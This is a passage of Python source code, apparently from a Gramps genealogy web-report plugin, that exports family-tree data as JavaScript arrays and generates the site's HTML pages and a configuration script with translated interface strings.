\"website\" : uri }\n\t\t\t# FTP server address\n\t\t\telif _type == UrlType.WEB_FTP:\n\t\t\t\tif not (uri.startswith(\"ftp://\") or uri.startswith(\"ftps://\")):\n\t\t\t\t\turi = \"ftp://%(ftpsite)s\" % { \"ftpsite\" : uri }\n\t\t\ttxt += sep + \"[\"\n\t\t\ttxt += \"\\\"\" + str(_type) + \"\\\",\"\n\t\t\ttxt += \"\\\"\" + script_escape(uri) + \"\\\",\"\n\t\t\ttxt += \"\\\"\" + script_escape(descr) + \"\\\"\"\n\t\t\ttxt += \"]\"\n\t\t\tsep = \",\"\n\t\ttxt += \"]\"\n\t\treturn(txt)\n\n\n\tdef _export_surnames(self):\n\t\t\"\"\"\n\t\tExport surnames data in Javascript file\n\t\tThe surnames data is stored in the Javascript Array \"SN\"\n\t\t\"\"\"\n\t\t# Extract the surnames data\n\t\tsurnames = defaultdict(list) #: Dictionary giving for each surname: the list of person handles with this surname\n\t\tsortnames = {} #: Dictionary giving for each person handle: a sortable string for the person\n\t\tperson_list = list(self.obj_dict[Person].keys())\n\t\tfor person_handle in person_list:\n\t\t\tperson = self.database.get_person_from_handle(person_handle)\n\t\t\tprimary_name = person.get_primary_name()\n\t\t\tif (primary_name.group_as):\n\t\t\t\tsurname = primary_name.group_as\n\t\t\telse:\n\t\t\t\tsurname = self.database.get_name_group_mapping(_nd.primary_surname(primary_name))\n\t\t\t# Treat people who have no name with those whose name is just 'whitespace'\n\t\t\tif (surname is None or surname.isspace()):\n\t\t\t\tsurname = \"\"\n\t\t\tsortnames[person_handle] = _nd.sort_string(primary_name)\n\t\t\tsurnames[surname].append(person_handle)\n\t\t# Sort surnames\n\t\tsurns_keys = list(surnames.keys())\n\t\tsurns_keys.sort(key = SORT_KEY)\n\t\t# Generate the file\n\t\tsw1 = StringIO()\n\t\tsw1.write(\n\t\t\t\"// This file is generated\\n\\n\"\n\t\t\t\"// 'SN' is sorted by surname\\n\"\n\t\t\t\"// 'SN' gives for each surname:\\n\"\n\t\t\t\"// - the surname\\n\"\n\t\t\t\"// - the surname first letter\\n\"\n\t\t\t\"// - the list of persion index (in table 'I') with this surname\\n\"\n\t\t\t\"\\nSN = [\")\n\t\tsep = \"\\n\"\n\t\tfor s in surns_keys:\n\t\t\t# Sort persons\n\t\t\tsurnames[s].sort(key = lambda x: sortnames[x])\n\t\t\ttab = \",\".join([str(self.obj_dict[Person][x][OBJDICT_INDEX]) for x in surnames[s]])\n\t\t\tsw1.write(sep + \"[\\\"\" + script_escape(s) + \"\\\", \\\"\" + first_letter(s).strip() + \"\\\", [\" + tab + \"]]\")\n\t\t\tsep = \",\\n\"\n\t\tsw1.write(\"\\n];\\n\")\n\t\tself.update_file(\"dwr_db_surns.js\", sw1.getvalue())\n\n\n\tdef _data_families_index(self, person):\n\t\tfams = []\n\t\tfamily_list = person.get_family_handle_list()\n\t\tif (family_list):\n\t\t\tfams = [self.obj_dict[Family][family_handle][OBJDICT_INDEX] for family_handle in family_list if (family_handle in self.obj_dict[Family])]\n\t\treturn(\n\t\t\t\"[\" +\n\t\t\t\",\".join([str(i) for i in fams]) +\n\t\t\t\"]\")\n\n\tdef _data_partners_index(self, family):\n\t\tindis = []\n\t\tperson_handle = family.get_father_handle()\n\t\tif (person_handle and (person_handle in self.obj_dict[Person])):\n\t\t\tindis.append(self.obj_dict[Person][person_handle][OBJDICT_INDEX])\n\t\tperson_handle = family.get_mother_handle()\n\t\tif (person_handle and (person_handle in self.obj_dict[Person])):\n\t\t\tindis.append(self.obj_dict[Person][person_handle][OBJDICT_INDEX])\n\t\treturn(\n\t\t\t\"[\" +\n\t\t\t\",\".join([str(i) for i in indis]) +\n\t\t\t\"]\")\n\n\tdef _data_parents_families_index(self, person):\n\t\tlinks = []\n\t\tfamily_list = person.get_parent_family_handle_list()\n\t\tif (family_list):\n\t\t\tfor family_handle in family_list:\n\t\t\t\tif (family_handle not in self.obj_dict[Family]): continue\n\t\t\t\tfamily = self.database.get_family_from_handle(family_handle)\n\t\t\t\tchild_refs = [\n\t\t\t\t\tchild_ref\n\t\t\t\t\tfor child_ref in family.get_child_ref_list()\n\t\t\t\t\tif (child_ref.ref == person.get_handle())\n\t\t\t\t]\n\t\t\t\tif (len(child_refs) >= 1):\n\t\t\t\t\tindex = self.obj_dict[Family][family_handle][OBJDICT_INDEX]\n\t\t\t\t\tlinks.append(self._data_child_ref(index, child_refs[0]))\n\t\treturn(\"[\" + \",\".join(links) + \"]\")\n\n\tdef _data_children_index(self, family):\n\t\tlinks = [\n\t\t\tself._data_child_ref(self.obj_dict[Person][child_ref.ref][OBJDICT_INDEX], child_ref)\n\t\t\tfor child_ref in family.get_child_ref_list()\n\t\t\tif (child_ref.ref in self.obj_dict[Person])\n\t\t]\n\t\treturn(\"[\" + \",\".join(links) + \"]\")\n\n\tdef _data_child_ref(self, index, child_ref):\n\t\t# Child reference in the form:\n\t\t# [index, relation to father, relation to mother, notes, list of citations]\n\t\ttxt = \"[\"\n\t\ttxt += str(index) + \",\"\n\t\ttxt += \"\\\"\" + script_escape(str(child_ref.get_father_relation())) + \"\\\",\"\n\t\ttxt += \"\\\"\" + script_escape(str(child_ref.get_mother_relation())) + \"\\\",\"\n\t\t# Get child reference notes\n\t\ttxt += \"\\\"\" + script_escape(self.get_notes_text(child_ref)) + \"\\\",\"\n\t\t# Get child reference sources\n\t\ttxt += self._data_source_citation_index(child_ref)\n\t\ttxt += \"]\"\n\t\treturn(txt)\n\n\n\tdef _data_associations(self, person):\n\t\tassoclist = person.get_person_ref_list()\n\t\trels = []\n\t\tfor person_ref in assoclist:\n\t\t\ttxt = \"[\"\n\t\t\tif (person_ref.ref not in self.obj_dict[Person]): continue\n\t\t\ttxt += \"%i,\" % self.obj_dict[Person][person_ref.ref][OBJDICT_INDEX]\n\t\t\ttxt += \"\\\"\" + script_escape(str(person_ref.get_relation())) + \"\\\",\"\n\t\t\t# Get association notes\n\t\t\ttxt += \"\\\"\" + script_escape(self.get_notes_text(person_ref)) + \"\\\",\"\n\t\t\t# Get association sources\n\t\t\ttxt += self._data_source_citation_index(person_ref)\n\t\t\ttxt += \"]\"\n\t\t\trels.append(txt)\n\t\treturn(\"[\" + \",\".join(rels) + \"]\")\n\n\n\tdef get_birth_year(self, person):\n\t\tev = get_birth_or_fallback(self.database, person)\n\t\treturn(self._get_year_text(ev) or \"?\")\n\tdef get_death_year(self, person):\n\t\tev = get_death_or_fallback(self.database, person)\n\t\treturn(self._get_year_text(ev))\n\tdef get_marriage_year(self, family):\n\t\tev = get_marriage_or_fallback(self.database, family)\n\t\treturn(self._get_year_text(ev))\n\tdef _get_year_text(self, event):\n\t\ty = \"\"\n\t\tif (event):\n\t\t\ty = \"?\"\n\t\t\tdate = event.get_date_object()\n\t\t\tmod = date.get_modifier()\n\t\t\tstart = date.get_start_date()\n\t\t\tif (mod == Date.MOD_NONE and start != Date.EMPTY):\n\t\t\t\ty = str(start[2])\n\t\treturn(y)\n\n\tdef get_birth_place(self, person):\n\t\tev = get_birth_or_fallback(self.database, person)\n\t\treturn(self._get_place_text(ev))\n\tdef get_death_place(self, person):\n\t\tev = get_death_or_fallback(self.database, person)\n\t\treturn(self._get_place_text(ev))\n\tdef get_marriage_place(self, family):\n\t\tev = get_marriage_or_fallback(self.database, family)\n\t\treturn(self._get_place_text(ev))\n\tdef _get_place_text(self, event):\n\t\tplace_name = \"\"\n\t\tif (event):\n\t\t\tplace_handle = event.get_place_handle()\n\t\t\tif (place_handle and (place_handle in self.obj_dict[Place])):\n\t\t\t\tplace_name = report_utils.place_name(self.database, place_handle)\n\t\treturn(place_name)\n\n\tdef get_death_age(self, person):\n\t\tev_birth = get_birth_or_fallback(self.database, person)\n\t\tbirth_date = None\n\t\tif (ev_birth): birth_date = ev_birth.get_date_object()\n\t\tev_death = get_death_or_fallback(self.database, person)\n\t\tdeath_date = None\n\t\tif (ev_death): death_date = ev_death.get_date_object()\n\t\tif (birth_date):\n\t\t\talive = probably_alive(person, self.database, Today())\n\t\t\tif (not alive and death_date):\n\t\t\t\tnyears = death_date - birth_date\n\t\t\t\tnyears.format(precision = 3)\n\t\t\t\treturn(str(nyears))\n\t\treturn(\"\");\n\n\n\tdef _export_pages(self):\n\t\t\"\"\"\n\t\tGenerate the HTML pages\n\t\t\"\"\"\n\t\t\n\t\t# Check pages configuration (in the options)\n\t\tpcset = set(self.page_content)\n\t\tif (len(pcset) != len(self.page_content)):\n\t\t\tlog.error(_(\"The pages configuration is not valid: several pages have the same content\"))\n\t\t\treturn\n\t\t\t\n\t\t# Export the script containing the web pages configuration\n\t\tself._export_script_configuration()\n\t\t\n\t\t# List of the scripts and CSS stylesheets used in the HTML pages\n\t\t# Note: other scripts and stylesheets are dynamically loaded in \"dwr_start.js\"\n\t\t# \"dwr_start.js\" is loaded in all pages uncontitionally (see L{write_header})\n\t\tdbscripts = [\"dwr_db_indi.js\", \"dwr_db_fam.js\", \"dwr_db_sour.js\", \"dwr_db_cita.js\", \"dwr_db_media.js\", \"dwr_db_place.js\", \"dwr_db_repo.js\", \"dwr_db_surns.js\"] #: list of the scripts to embed in the HTML\n\t\tmapscripts = [] #: list of the scripts to embed in the HTML pages that show a map\n\t\tmapstyles = [] #: list of the CSS stylesheets to embed in the HTML pages that show a map\n\t\tif (self.options['placemappages'] or self.options['familymappages']):\n\t\t\tif (self.options['mapservice'] == \"Google\"):\n\t\t\t\tmapscripts = [\"http://maps.googleapis.com/maps/api/js?sensor=false\"]\n\t\t\telse:\n\t\t\t\tmapscripts = [\"http://openlayers.org/en/v3.0.0/build/ol.js\"]\n\t\t\t\tmapstyles = [\"http://openlayers.org/en/v3.0.0/css/ol.css\"]\n\t\t\t\t# mapscripts = [\"ol.js\"]\n\t\t\t\t# mapstyles = [\"ol.css\"]\n\t\t\t\t# mapscripts = [\"http://cdn.leafletjs.com/leaflet-0.7.3/leaflet.js\"]\n\t\t\t\t# mapstyles = [\"http://cdn.leafletjs.com/leaflet-0.7.3/leaflet.css\"]\n\t\t\t\t\n\t\t#: List of page to generate: index in L{PAGES_NAMES}, Javascript code for generating the page\n\t\tparts = {\n\t\t\tPAGE_PERSON: (dbscripts, \"DwrMain(PAGE_INDI);\"),\n\t\t\tPAGE_SURNAMES: (dbscripts, \"printSurnamesIndex();\"),\n\t\t\tPAGE_PERSON_INDEX: (dbscripts, \"printPersonsIndex();\"),\n\t\t\tPAGE_FAMILY_INDEX: (dbscripts, \"printFamiliesIndex();\"),\n\t\t\tPAGE_SOURCE_INDEX: (dbscripts, \"printSourcesIndex();\"),\n\t\t\tPAGE_MEDIA_INDEX: (dbscripts, \"printMediaIndex();\"),\n\t\t\tPAGE_PLACE_INDEX: (dbscripts, \"printPlacesIndex();\"),\n\t\t\tPAGE_ADDRESS_INDEX: (dbscripts, \"printAddressesIndex();\"),\n\t\t\tPAGE_REPOSITORY_INDEX: (dbscripts, \"printReposIndex();\"),\n\t\t\tPAGE_SVG_TREE: (dbscripts, \"DwrMain(PAGE_SVG_TREE);\"),\n\t\t}\n\t\t\n\t\t# Export the HTML pages listed in L{PAGES_NAMES}\n\t\tfor i in range(self.pages_number):\n\t\t\tpc = self.page_content[i] # Get the page i contents defined in the options\n\t\t\tfilename = PAGES_NAMES[pc][2]\n\t\t\ttitle = self.page_name[pc]\n\t\t\tif (pc in parts):\n\t\t\t\t# The page is not a custom page\n\t\t\t\t(scripts, cmd) = parts[pc]\n\t\t\t\tself._export_html_page(filename, title, cmd, True, scripts)\n\t\t\telse:\n\t\t\t\t# The page is a custom page\n\t\t\t\ti_cst = pc - PAGE_CUSTOM\n\t\t\t\tself._export_custom_page(filename, title, self.custom_menu[i_cst], self.custom_note[i_cst])\n\n\t\t# The person page is required\n\t\tif (PAGE_PERSON not in self.page_content):\n\t\t\tself._export_html_page(\"person.html\", self.page_name[PAGE_PERSON], \"DwrMain(PAGE_INDI);\", True, dbscripts)\n\n\t\t# The search results page is required\n\t\tself._export_html_page(\"search.html\", _(\"Search results\"), \"DwrMain(PAGE_SEARCH);\", True, dbscripts)\n\n\t\t# Page for printing a family (if needed)\n\t\tif (self.inc_families):\n\t\t\tself._export_html_page(\"family.html\", self.page_name[PAGE_FAMILY_INDEX], \"DwrMain(PAGE_FAM);\", True, dbscripts + mapscripts , mapstyles)\n\t\t\n\t\t# Generate page surnames pages (if surnames page is used)\n\t\tif (PAGE_SURNAMES in self.page_content):\n\t\t\t# Page for persons with a given surname\n\t\t\tself._export_html_page(\"surname.html\", self.page_name[PAGE_SURNAMES], \"printSurnameIndex();\", True, dbscripts)\n\t\t\t# Page for surnames sorted by quantity\n\t\t\tself._export_html_page(\"surnames2.html\", self.page_name[PAGE_SURNAMES], \"printSurnamesIndex2();\", True, dbscripts)\n\n\t\t# Page for a single family (if needed)\n\t\tif (self.inc_sources):\n\t\t\tself._export_html_page(\"source.html\", self.page_name[PAGE_SOURCE_INDEX], \"DwrMain(PAGE_SOURCE);\", True, dbscripts)\n\n\t\t# Page for a single media (if needed)\n\t\tif (self.inc_gallery):\n\t\t\tself._export_html_page(\"media.html\", self.page_name[PAGE_MEDIA_INDEX], \"DwrMain(PAGE_MEDIA);\", True, dbscripts)\n\n\t\t# Page for a single place (if needed)\n\t\tif (self.inc_places):\n\t\t\tself._export_html_page(\"place.html\", self.page_name[PAGE_PLACE_INDEX], \"DwrMain(PAGE_PLACE);\", True, dbscripts + mapscripts , mapstyles)\n\n\t\t# Page for a single repository (if needed)\n\t\tif (self.inc_repositories):\n\t\t\tself._export_html_page(\"repository.html\", self.page_name[PAGE_REPOSITORY_INDEX], \"DwrMain(PAGE_REPO);\", True, dbscripts)\n\n\t\t# Page for full-screen SVG graph (if SVG graph is used)\n\t\tif (PAGE_SVG_TREE in self.page_content):\n\t\t\tself._export_html_page(\"tree_svg_full.html\", self.page_name[PAGE_SVG_TREE], \"DwrMain(PAGE_SVG_TREE_FULL);\", False, dbscripts)\n\t\t\tself._export_html_page(\"tree_svg_conf.html\", self.page_name[PAGE_SVG_TREE], \"DwrMain(PAGE_SVG_TREE_CONF);\", True, dbscripts)\n\t\t\tself._export_html_page(\"tree_svg_save.html\", self.page_name[PAGE_SVG_TREE], \"DwrMain(PAGE_SVG_TREE_SAVE);\", True, dbscripts)\n\n\n\tdef _export_script_configuration(self):\n\t\t\"\"\"\n\t\tGenerate \"dwr_conf.js\", which contains:\n\t\t - The pages configuration (mostly extract of the report options),\n\t\t - The localization (translated strings)\n\t\t - Gramps constants that could be used in the Javascript\n\t\t\"\"\"\n\t\tsw = StringIO()\n\t\tsw.write(\"// This file is generated\\n\\n\")\n\t\tsw.write(\"NB_GENERATIONS_MAX = %i;\\n\" % int(self.options[\"graphgens\"]))\n\t\tsw.write(\"PAGES_TITLE = [\")\n\t\tsw.write(\", \".join([\n\t\t\t(\"\\\"\" + script_escape(self.page_name[self.page_content[i]]).replace(\" \", \" \") + \"\\\"\")\n\t\t\tfor i in range(self.pages_number)]))\n\t\tsw.write(\"];\\n\")\n\t\tsw.write(\"PAGES_FILE = [\")\n\t\tsw.write(\", \".join([\n\t\t\t(\"\\\"\" + script_escape(PAGES_NAMES[self.page_content[i]][2]) + \"\\\"\")\n\t\t\tfor i in range(self.pages_number)]))\n\t\tsw.write(\"];\\n\")\n\t\tsw.write(\"SVG_TREE_TYPES_NAMES = [\")\n\t\tsw.write(\", \".join([(\"\\\"\" + script_escape(n) + \"\\\"\") for n in SVG_TREE_TYPES]))\n\t\tsw.write(\"];\\n\")\n\t\tsw.write(\"SVG_TREE_SHAPES_NAMES = [\")\n\t\tsw.write(\", \".join([(\"\\\"\" + script_escape(n) + \"\\\"\") for n in SVG_TREE_SHAPES]))\n\t\tsw.write(\"];\\n\")\n\t\tsw.write(\"SVG_TREE_DISTRIB_ASC_NAMES = [\")\n\t\tsw.write(\", \".join([(\"\\\"\" + script_escape(n) + \"\\\"\") for n in SVG_TREE_DISTRIB_ASC]))\n\t\tsw.write(\"];\\n\")\n\t\tsw.write(\"SVG_TREE_DISTRIB_DSC_NAMES = [\")\n\t\tsw.write(\", \".join([(\"\\\"\" + script_escape(n) + \"\\\"\") for n in SVG_TREE_DISTRIB_DSC]))\n\t\tsw.write(\"];\\n\")\n\t\tsw.write(\"SVG_TREE_BACKGROUND_NAMES = [\")\n\t\tsw.write(\", \".join([(\"\\\"\" + script_escape(n) + \"\\\"\") for n in SVG_TREE_BACKGROUNDS]))\n\t\tsw.write(\"];\\n\")\n\t\tsw.write(\"SVG_TREE_TYPE = %s;\\n\" % self.options['svg_tree_type'])\n\t\tsw.write(\"SVG_TREE_SHAPE = %s;\\n\" % self.options['svg_tree_shape'])\n\t\tsw.write(\"SVG_TREE_DISTRIB_ASC = %s;\\n\" % self.options['svg_tree_distrib_asc'])\n\t\tsw.write(\"SVG_TREE_DISTRIB_DSC = %s;\\n\" % self.options['svg_tree_distrib_dsc'])\n\t\tsw.write(\"SVG_TREE_BACKGROUND = %s;\\n\" % self.options['svg_tree_background'])\n\t\tsw.write(\"SVG_TREE_COLOR1 = \\\"%s\\\";\\n\" % self.options['svg_tree_color1'])\n\t\tsw.write(\"SVG_TREE_COLOR2 = \\\"%s\\\";\\n\" % self.options['svg_tree_color2'])\n\t\tsw.write(\"SVG_TREE_SHOW_DUP = \" + (\"true\" if (self.options['svg_tree_dup']) else \"false\") + \";\\n\")\n\t\tsw.write(\"SVG_TREE_COLOR_DUP = \\\"%s\\\";\\n\" % self.options['svg_tree_color_dup'])\n\t\tsw.write(\"GRAMPS_PREFERENCES = [];\\n\")\n\t\tfor pref in [\n\t\t\t'bordercolor-gender-female-alive',\n\t\t\t'bordercolor-gender-female-death',\n\t\t\t'bordercolor-gender-male-alive',\n\t\t\t'bordercolor-gender-male-death',\n\t\t\t'bordercolor-gender-unknown-alive',\n\t\t\t'bordercolor-gender-unknown-death',\n\t\t\t'color-gender-female-alive',\n\t\t\t'color-gender-female-death',\n\t\t\t'color-gender-male-alive',\n\t\t\t'color-gender-male-death',\n\t\t\t'color-gender-unknown-alive',\n\t\t\t'color-gender-unknown-death',\n\t\t\t]:\n\t\t\tsw.write(\"GRAMPS_PREFERENCES['%s'] = \\\"%s\\\";\\n\" % (pref, config.get('preferences.%s' % pref)))\n\t\tsw.write(\"SVG_TREE_COLOR_SCHEME0 = [\" + \", \".join(\n\t\t\t[(\"\\\"#%02x%02x%02x\\\"\" % (r, g, b)) for (r, g, b) in GENCOLOR[BACKGROUND_WHITE]])\n\t\t\t+ \"];\\n\")\n\t\tsw.write(\"SVG_TREE_COLOR_SCHEME1 = [\" + \", \".join(\n\t\t\t[(\"\\\"#%02x%02x%02x\\\"\" % (r, g, b)) for (r, g, b) in GENCOLOR[BACKGROUND_SCHEME1]])\n\t\t\t+ \"];\\n\")\n\t\tsw.write(\"SVG_TREE_COLOR_SCHEME2 = [\" + \", \".join(\n\t\t\t[(\"\\\"#%02x%02x%02x\\\"\" % (r, g, b)) for (r, g, b) in GENCOLOR[BACKGROUND_SCHEME2]])\n\t\t\t+ \"];\\n\")\n\t\tsw.write(\"FOOTER=\\\"\" + script_escape(self.get_header_footer_notes(\"footernote\")) + \"\\\";\\n\")\n\t\tsw.write(\"HEADER=\\\"\" + script_escape(self.get_header_footer_notes(\"headernote\")) + \"\\\";\\n\")\n\t\tsw.write(\"COPYRIGHT=\\\"\" + script_escape(self.get_copyright_license()) + \"\\\";\\n\")\n\t\tsw.write(\"INDEX_SHOW_BIRTH=\" + (\"true\" if (self.options['showbirth']) else \"false\") + \";\\n\")\n\t\tsw.write(\"INDEX_SHOW_DEATH=\" + (\"true\" if (self.options['showdeath']) else \"false\") + \";\\n\")\n\t\tsw.write(\"INDEX_SHOW_MARRIAGE=\" + (\"true\" if (self.options['showmarriage']) else \"false\") + \";\\n\")\n\t\tsw.write(\"INDEX_SHOW_PARTNER=\" + (\"true\" if (self.options['showpartner']) else \"false\") + \";\\n\")\n\t\tsw.write(\"INDEX_SHOW_PARENTS=\" + (\"true\" if (self.options['showparents']) else \"false\") + \";\\n\")\n\t\tsw.write(\"INDEX_SHOW_ALL_SIBLINGS=\" + (\"true\" if (self.options['birthorder']) else \"false\") + \";\\n\")\n\t\tsw.write(\"INDEX_SHOW_BKREF_TYPE=\" + (\"true\" if (self.options['bkref_type']) else \"false\") + \";\\n\")\n\t\tsw.write(\"SORT_CHILDREN=\" + (\"true\" if (self.options['showallsiblings']) else \"false\") + \";\\n\")\n\t\tsw.write(\"INC_EVENTS=\" + (\"true\" if (self.inc_events) else \"false\") + \";\\n\")\n\t\tsw.write(\"INC_FAMILIES=\" + (\"true\" if (self.inc_families) else \"false\") + \";\\n\")\n\t\tsw.write(\"INC_SOURCES=\" + (\"true\" if (self.inc_sources) else \"false\") + \";\\n\")\n\t\tsw.write(\"INC_MEDIA=\" + (\"true\" if (self.inc_gallery) else \"false\") + \";\\n\")\n\t\tsw.write(\"INC_PLACES=\" + (\"true\" if (self.inc_places) else \"false\") + \";\\n\")\n\t\tsw.write(\"INC_REPOSITORIES=\" + (\"true\" if (self.inc_repositories) else \"false\") + \";\\n\")\n\t\tsw.write(\"INC_NOTES=\" + (\"true\" if (self.inc_notes) else \"false\") + \";\\n\")\n\t\tsw.write(\"INC_ADDRESSES=\" + (\"true\" if (self.inc_addresses) else \"false\") + \";\\n\")\n\t\tsw.write(\"MAP_PLACE=\" + (\"true\" if (self.options['placemappages']) else \"false\") + \";\\n\")\n\t\tsw.write(\"MAP_FAMILY=\" + (\"true\" if (self.options['familymappages']) else \"false\") + \";\\n\")\n\t\tsw.write(\"MAP_SERVICE=\\\"\" + script_escape(self.options['mapservice']) + \"\\\";\\n\")\n\t\tsw.write(\"__ = {\")\n\t\tsep = \"\\n\"\n\t\tfor (s, translated) in (\n\t\t\t(\"(filtered from _MAX_ total entries)\", _(\"(filtered from _MAX_ total entries)\")),\n\t\t\t(\"(sort by name)\", _(\"(sort by name)\")),\n\t\t\t(\"(sort by quantity)\", _(\"(sort by quantity)\")),\n\t\t\t(\": activate to sort column ascending\", _(\": activate to sort column ascending\")),\n\t\t\t(\": activate to sort column descending\", _(\": activate to sort column descending\")),\n\t\t\t(\"

    Click on a person to center the graph on this person.
    When clicking on the center person, the person page is shown.

    The type of graph could be selected in the list (on the top left side of the graph)

    The number of ascending end descending generations could also be adjusted.

    Use the mouse wheel or the buttons to zoom in and out.

    The graph could also be shown full-screen.\", _(\"

    Click on a person to center the graph on this person.
    When clicking on the center person, the person page is shown.

    The type of graph could be selected in the list (on the top left side of the graph)

    The number of ascending end descending generations could also be adjusted.

    Use the mouse wheel or the buttons to zoom in and out.

    The graph could also be shown full-screen.\")),\n\t\t\t(\"

    This page provides the SVG raw code.
    Copy the contents into a text editor and save as an SVG file.
    Make sure that the text editor encoding is UTF-8.

    \", _(\"

    This page provides the SVG raw code.
    Copy the contents into a text editor and save as an SVG file.
    Make sure that the text editor encoding is UTF-8.

    \")),\n\t\t\t(\"Address\", _(\"Address\")),\n\t\t\t(\"Addresses\", _(\"Addresses\")),\n\t\t\t(\"Age at Death\", _(\"Age at Death\")),\n\t\t\t(\"Alternate Name\", _(\"Alternate Name\")),\n\t\t\t(\"Ancestors\", _(\"Ancestors\")),\n\t\t\t(\"Associations\", _(\"Associations\")),\n\t\t\t(\"Attribute\", _(\"Attribute\")),\n\t\t\t(\"Attributes\", _(\"Attributes\")),\n\t\t\t(\"Background\", _(\"Background\")),\n\t\t\t(\"Call Name\", _(\"Call Name\")),\n\t\t\t(\"Call Number\", _(\"Call Number\")),\n\t\t\t(\"Children\", _(\"Children\")),\n\t\t\t(\"Church Parish\", _(\"Church Parish\")),\n\t\t\t(\"Citation\", _(\"Citation\")),\n\t\t\t(\"Citations\", _(\"Citations\")),\n\t\t\t(\"City\", _(\"City\")),\n\t\t\t(\"Click on the map to show it full-screen\", _(\"Click on the map to show it full-screen\")),\n\t\t\t(\"Configuration\", _(\"Configuration\")),\n\t\t\t(\"Country\", _(\"Country\")),\n\t\t\t(\"County\", _(\"County\")),\n\t\t\t(\"Date\", _(\"Date\")),\n\t\t\t(\"Descendants\", _(\"Descendants\")),\n\t\t\t(\"Description\", _(\"Description\")),\n\t\t\t(\"Event\", _(\"Event\")),\n\t\t\t(\"Events\", _(\"Events\")),\n\t\t\t(\"Expand\", _(\"Expand\")),\n\t\t\t(\"Families Index\", _(\"Families Index\")),\n\t\t\t(\"Family Nick Name\", _(\"Family Nick Name\")),\n\t\t\t(\"Father\", _(\"Father\")),\n\t\t\t(\"Female\", _(\"Female\")),\n\t\t\t(\"File ready\", _(\"File ready\")),\n\t\t\t(\"Gender\", _(\"Gender\")),\n\t\t\t(\"Graph help\", _(\"Graph help\")),\n\t\t\t(\"Latitude\", _(\"Latitude\")),\n\t\t\t(\"Link\", _(\"Link\")),\n\t\t\t(\"Loading...\", _(\"Loading...\")),\n\t\t\t(\"Locality\", _(\"Locality\")),\n\t\t\t(\"Location\", _(\"Location\")),\n\t\t\t(\"Longitude\", _(\"Longitude\")),\n\t\t\t(\"Male\", _(\"Male\")),\n\t\t\t(\"Map\", _(\"Map\")),\n\t\t\t(\"Maximize\", _(\"Maximize\")),\n\t\t\t(\"Media found:\", _(\"Media found:\")),\n\t\t\t(\"Media Index\", _(\"Media Index\")),\n\t\t\t(\"Media Type\", _(\"Media Type\")),\n\t\t\t(\"Media\", _(\"Media\")),\n\t\t\t(\"Mother\", _(\"Mother\")),\n\t\t\t(\"Name\", _(\"Name\")),\n\t\t\t(\"Nick Name\", _(\"Nick Name\")),\n\t\t\t(\"No data available in table\", _(\"No data available in table\")),\n\t\t\t(\"No matching records found\", _(\"No matching records found\")),\n\t\t\t(\"No matching surname.\", _(\"No matching surname.\")),\n\t\t\t(\"None.\", _(\"None.\")),\n\t\t\t(\"Notes\", _(\"Notes\")),\n\t\t\t(\"OK\", _(\"OK\")),\n\t\t\t(\"Parents\", _(\"Parents\")),\n\t\t\t(\"Path\", _(\"Path\")),\n\t\t\t(\"Person page\", _(\"Person page\")),\n\t\t\t(\"Person to search for\", _(\"Person to search for\")),\n\t\t\t(\"Person\", _(\"Person\")),\n\t\t\t(\"Persons found:\", _(\"Persons found:\")),\n\t\t\t(\"Persons Index\", _(\"Persons Index\")),\n\t\t\t(\"Phone\", _(\"Phone\")),\n\t\t\t(\"Place\", _(\"Place\")),\n\t\t\t(\"Places found:\", _(\"Places found:\")),\n\t\t\t(\"Places Index\", _(\"Places Index\")),\n\t\t\t(\"Postal Code\", _(\"Postal Code\")),\n\t\t\t(\"Preparing file ...\", _(\"Preparing file ...\")),\n\t\t\t(\"Processing...\", _(\"Processing...\")),\n\t\t\t(\"References\", _(\"References\")),\n\t\t\t(\"Relationship to Father\", _(\"Relationship to Father\")),\n\t\t\t(\"Relationship to Mother\", _(\"Relationship to Mother\")),\n\t\t\t(\"Relationship\", _(\"Relationship\")),\n\t\t\t(\"Repositories\", _(\"Repositories\")),\n\t\t\t(\"Repository\", _(\"Repository\")),\n\t\t\t(\"Restore\", _(\"Restore\")),\n\t\t\t(\"Save tree as file\", _(\"Save tree as file\")),\n\t\t\t(\"Search:\", _(\"Search:\")),\n\t\t\t(\"Select the background color scheme\", _(\"Select the background color scheme\")),\n\t\t\t(\"Select the children distribution (fan charts only)\", _(\"Select the children distribution (fan charts only)\")),\n\t\t\t(\"Select the number of ascending generations\", _(\"Select the number of ascending generations\")),\n\t\t\t(\"Select the number of descending generations\", _(\"Select the number of descending generations\")),\n\t\t\t(\"Select the parents distribution (fan charts only)\", _(\"Select the parents distribution (fan charts only)\")),\n\t\t\t(\"Select the shape of graph\", _(\"Select the shape of graph\")),\n\t\t\t(\"Select the type of graph\", _(\"Select the type of graph\")),\n\t\t\t(\"Several matches.
    Precise your search or choose in the lists below.\", _(\"Several matches.
    Precise your search or choose in the lists below.\")),\n\t\t\t(\"Show _MENU_ entries\", _(\"Show _MENU_ entries\")),\n\t\t\t(\"Showing 0 to 0 of 0 entries\", _(\"Showing 0 to 0 of 0 entries\")),\n\t\t\t(\"Showing _START_ to _END_ of _TOTAL_ entries\", _(\"Showing _START_ to _END_ of _TOTAL_ entries\")),\n\t\t\t(\"Siblings\", _(\"Siblings\")),\n\t\t\t(\"Source\", _(\"Source\")),\n\t\t\t(\"Sources found:\", _(\"Sources found:\")),\n\t\t\t(\"Sources Index\", _(\"Sources Index\")),\n\t\t\t(\"Sources\", _(\"Sources\")),\n\t\t\t(\"Spouses\", _(\"Spouses\")),\n\t\t\t(\"State/ Province\", _(\"State/ Province\")),\n\t\t\t(\"Street\", _(\"Street\")),\n\t\t\t(\"Surnames Index\", _(\"Surnames Index\")),\n\t\t\t(\"SVG tree children distribution\", _(\"SVG tree children distribution\")),\n\t\t\t(\"SVG tree graph shape\", _(\"SVG tree graph shape\")),\n\t\t\t(\"SVG tree graph type\", _(\"SVG tree graph type\")),\n\t\t\t(\"SVG tree parents distribution\", _(\"SVG tree parents distribution\")),\n\t\t\t(\"There is no matching name.\", _(\"There is no matching name.\")),\n\t\t\t(\"Title\", _(\"Title\")),\n\t\t\t(\"Type\", _(\"Type\")),\n\t\t\t(\"Unknown\", _(\"Unknown\")),\n\t\t\t(\"Use the search box above in order to find a person.
    Women are listed with their maiden name.\", _(\"Use the search box above in order to find a person.
